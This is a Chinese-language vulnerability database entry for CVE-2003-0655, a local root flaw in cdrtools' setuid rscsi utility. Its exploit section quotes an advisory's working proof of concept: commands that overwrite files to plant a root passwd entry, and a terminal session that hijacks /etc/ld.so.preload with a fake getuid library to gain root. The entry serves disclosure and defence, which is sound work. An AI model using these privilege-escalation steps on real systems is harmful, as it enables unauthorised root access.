cdrtools rscsi覆盖文件漏洞

cdrtools rscsi覆盖文件漏洞

漏洞ID 1107436 漏洞类型 未知
发布时间 2003-08-01 更新时间 2003-08-27
图片[1]-cdrtools rscsi覆盖文件漏洞-安全小百科CVE编号 CVE-2003-0655
图片[2]-cdrtools rscsi覆盖文件漏洞-安全小百科CNNVD-ID CNNVD-200308-192
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/22979
https://www.securityfocus.com/bid/87725
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-192
|漏洞详情
cdrtools2.01及其早期版本的rscsi存在漏洞。本地用户可以通过指定目标文件作为命令行参数覆盖任意文件并提升特权,该目标文件在rscsi以特权运行时被修改。
|漏洞EXP
source: http://www.securityfocus.com/bid/8328/info

It has been reported that the rscsi utility may provide for the modification of ownership and the corruption of arbitrary attacker specified files. 

It has been reported that a local attacker may invoke the rscsi utility to corrupt or seize group ownership of an attacker specified file. Because the rscsi utility is installed with setuid 'root' permissions by default, a local attacker may harness this vulnerability to achieve elevated privileges.

$ echo C`echo -e 
"x08x08x08x08x08x08x08x08x08x08r00t::0:0:root:/:/bin/bashx0a"` | 
/opt/schily/sbin/rscsi /tmp/lala


[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}
[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.so oops.o
[kf@vegeta kf]$ ls -al oops.so
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so
[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
E0
Garbage command
0
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload
[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/ld.so.preload
rm: remove regular file `/etc/ld.so.preload'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
|受影响的产品
CDRTools CDRTools 2.0.3

CDRTools CDRTools 2.0

|参考资料

来源:www.secnetops.com
链接:http://www.secnetops.com/research/advisories/SRT2003-08-01-0126.txt
来源:BUGTRAQ
名称:20030801SRT2003-08-01-0126-cdrtoolslocalrootexploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105978381618095&w;=2

相关推荐: Cfingerd GECOS Buffer Overflow Vulnerability

Cfingerd GECOS Buffer Overflow Vulnerability 漏洞ID 1104589 漏洞类型 Boundary Condition Error 发布时间 1999-09-21 更新时间 1999-09-21 CVE编号 N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享